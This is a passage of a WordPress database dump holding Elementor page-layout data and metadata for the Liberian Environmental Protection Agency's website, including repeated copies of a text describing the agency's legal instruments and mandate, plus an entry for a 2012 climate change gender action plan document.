_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"df7fe5f\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,300px,450px,auto,auto,auto\\\" term=\\\"resource_tag:epa\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(12579,2056,'_elementor_edit_mode','builder'),(12580,2056,'_elementor_template_type','wp-post'),(12581,2056,'_elementor_version','2.7.5'),(12582,2056,'_wp_page_template','default'),(12583,2056,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7516eed\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Protection Agency (EPA) is the regulatory Institution of the Government of Liberia for the sustainable management of the environment and its natural resources. The Agency was established by an act of the Legislature November 26, 2002 and published into hand bill on April 30, 2003.<\\/p><p>The EPA operates on three basic legal Instruments: The National Environmental Policy (NEP), The Environmental Management and Protection Law of Liberia and the Act Creating the Environmental Protection Agency. Of these three instruments, the National Environmental Policy ordered the creation of the Environmental Protection Agency to ensure sound environmental management and put in place measure to avoid irreparable damage to the country\\u2019s natural resources. The NEP seeks to harmonize cross cutting functions between and amongst agencies. The NEP seeks to ensure long-term economic prosperity of Liberia through sustainable social and economic development of the generation without endangering the potential of future generation. The objective of the NEP is to improve the physical environment, the quality of life and the improvement of economic and social living condition of the citizenry present and future generations. It also seeks to ensure reconciliation and coordination between economic development and growth with the sustainable management of the natural resources. A National Environmental Policy provides a broad framework for the implementation of national objectives and plans.<\\/p><p>The Environmental Protection and Management Law (EPML) of Liberia establishes a legal framework for the sustainable development, management and protection of the environment by the Environment Protection Agency in partnership with regulatory Ministries and organizations and in a close and responsive relationship with the people of Liberia; and to provide high quality information and advice on the state of the environment and for matters connected therewith. The EMPL have several principles and objectives to include but not limited to the following: The principle of sustainable development; The pre-cautionary principle, The polluter - pays principle, The principle of inter-generational equity, The principle of public participation, The principle of international co-operation in the management of environmental resources shared by two or more states; and Other principles of natural resources and environmental management.<\\/p><p>The Act creating the Agency provides the legal mandates and authority to manage coordinate, monitor and supervise in consultation with relevant line Ministries, Agencies and organization, and other relevant stakeholders for the protection of the environment and sustainable use of natural resources. The act details the functions of the EPA from the Policy Council to environmental inspectors. The Act also clearly explain the entire environmental impact assessment (EIA) process in its totality.<\\/p><h5>Mandate<\\/h5><p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4021bb6\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"66be95e\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"49e2ba5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9fe992\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"df7fe5f\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:epa\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(12591,2057,'_elementor_edit_mode','builder'),(12592,2057,'_elementor_template_type','wp-page'),(12593,2057,'_elementor_version','2.7.5'),(12594,2057,'_wp_page_template','default'),(12595,2057,'_elementor_data','[{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2acca5d\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_tag:Uploaded By,\\ntax:resource_category:Categories,\\n\\\" width=\\\"400px,450px,auto,auto\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(12598,2058,'_elementor_edit_mode','builder'),(12599,2058,'_elementor_template_type','wp-page'),(12600,2058,'_elementor_version','2.7.5'),(12601,2058,'_wp_page_template','default'),(12602,2058,'_elementor_data','[{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2acca5d\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_tag:Uploaded By,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(12625,2063,'_elementor_controls_usage','a:0:{}'),(12626,2063,'by','EPA'),(12627,2063,'year','2012'),(12628,2063,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/2012_IUCN_Climate-Change-Gender-Action-Plan-Liberia.pdf'),(12629,2063,'_pods_cover_image','a:1:{i:0;i:573;}'),(12630,2063,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(12635,2063,'_dp_original','1747'),(12636,2063,'_edit_lock','1670324609:42'),(12637,2063,'_edit_last','42'),(12638,2064,'_wp_attached_file','2019/11/2012_IUCN_Climate-Change-Gender-Action-Plan-Liberia.pdf'),(12640,2063,'_pods_attached_document','a:1:{i:0;i:2064;}'),(12663,975,'_edit_lock','1573732446:1'),(12664,975,'_bbp_forum_id','0'),(12665,975,'_bbp_status','open'),(12666,975,'_bbp_forum_type','forum'),(12667,1815,'_edit_lock','1573858479:1'),(12691,2072,'_elementor_edit_mode','builder'),(12692,2072,'_elementor_template_type','wp-post'),(12693,2072,'_elementor_version','2.7.5'),(12694,2072,'_wp_page_template','default'),(12695,2072,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7516eed\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Protection Agency (EPA) is the regulatory Institution of the Government of Liberia for the sustainable management of the environment and its natural resources. The Agency was established by an act of the Legislature November 26, 2002 and published into hand bill on April 30, 2003.<\\/p><p>The EPA operates on three basic legal Instruments: The National Environmental Policy (NEP), The Environmental Management and Protection Law of Liberia and the Act Creating the Environmental Protection Agency. Of these three instruments, the National Environmental Policy ordered the creation of the Environmental Protection Agency to ensure sound environmental management and put in place measure to avoid irreparable damage to the country\\u2019s natural resources. The NEP seeks to harmonize cross cutting functions between and amongst agencies. The NEP seeks to ensure long-term economic prosperity of Liberia through sustainable social and economic development of the generation without endangering the potential of future generation. The objective of the NEP is to improve the physical environment, the quality of life and the improvement of economic and social living condition of the citizenry present and future generations. It also seeks to ensure reconciliation and coordination between economic development and growth with the sustainable management of the natural resources. A National Environmental Policy provides a broad framework for the implementation of national objectives and plans.<\\/p><p>The Environmental Protection and Management Law (EPML) of Liberia establishes a legal framework for the sustainable development, management and protection of the environment by the Environment Protection Agency in partnership with regulatory Ministries and organizations and in a close and responsive relationship with the people of Liberia; and to provide high quality information and advice on the state of the environment and for matters connected therewith. The EMPL have several principles and objectives to include but not limited to the following: The principle of sustainable development; The pre-cautionary principle, The polluter - pays principle, The principle of inter-generational equity, The principle of public participation, The principle of international co-operation in the management of environmental resources shared by two or more states; and Other principles of natural resources and environmental management.<\\/p><p>The Act creating the Agency provides the legal mandates and authority to manage coordinate, monitor and supervise in consultation with relevant line Ministries, Agencies and organization, and other relevant stakeholders for the protection of the environment and sustainable use of natural resources. The act details the functions of the EPA from the Policy Council to environmental inspectors. The Act also clearly explain the entire environmental impact assessment (EIA) process in its totality.<\\/p><h5>Mandate<\\/h5><p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4021bb6\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2815956\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Coming up<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"66be95e\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"49e2ba5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9fe992\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"df7fe5f\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:epa\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(12698,2073,'_elementor_edit_mode','builder'),(12699,2073,'_elementor_template_type','wp-post'),(12700,2073,'_elementor_version','2.7.5'),(12701,2073,'_wp_page_template','default'),(12702,2073,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7516eed\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Protection Agency (EPA) is the regulatory Institution of the Government of Liberia for the sustainable management of the environment and its natural resources. The Agency was established by an act of the Legislature November 26, 2002 and published into hand bill on April 30, 2003.<\\/p><p>The EPA operates on three basic legal Instruments: The National Environmental Policy (NEP), The Environmental Management and Protection Law of Liberia and the Act Creating the Environmental Protection Agency. Of these three instruments, the National Environmental Policy ordered the creation of the Environmental Protection Agency to ensure sound environmental management and put in place measure to avoid irreparable damage to the country\\u2019s natural resources. The NEP seeks to harmonize cross cutting functions between and amongst agencies. The NEP seeks to ensure long-term economic prosperity of Liberia through sustainable social and economic development of the generation without endangering the potential of future generation. The objective of the NEP is to improve the physical environment, the quality of life and the improvement of economic and social living condition of the citizenry present and future generations. It also seeks to ensure reconciliation and coordination between economic development and growth with the sustainable management of the natural resources. A National Environmental Policy provides a broad framework for the implementation of national objectives and plans.<\\/p><p>The Environmental Protection and Management Law (EPML) of Liberia establishes a legal framework for the sustainable development, management and protection of the environment by the Environment Protection Agency in partnership with regulatory Ministries and organizations and in a close and responsive relationship with the people of Liberia; and to provide high quality information and advice on the state of the environment and for matters connected therewith. The EMPL have several principles and objectives to include but not limited to the following: The principle of sustainable development; The pre-cautionary principle, The polluter - pays principle, The principle of inter-generational equity, The principle of public participation, The principle of international co-operation in the management of environmental resources shared by two or more states; and Other principles of natural resources and environmental management.<\\/p><p>The Act creating the Agency provides the legal mandates and authority to manage coordinate, monitor and supervise in consultation with relevant line Ministries, Agencies and organization, and other relevant stakeholders for the protection of the environment and sustainable use of natural resources. The act details the functions of the EPA from the Policy Council to environmental inspectors. The Act also clearly explain the entire environmental impact assessment (EIA) process in its totality.<\\/p><h5>Mandate<\\/h5><p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2815956\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Coming up<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"66be95e\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"49e2ba5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9fe992\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related 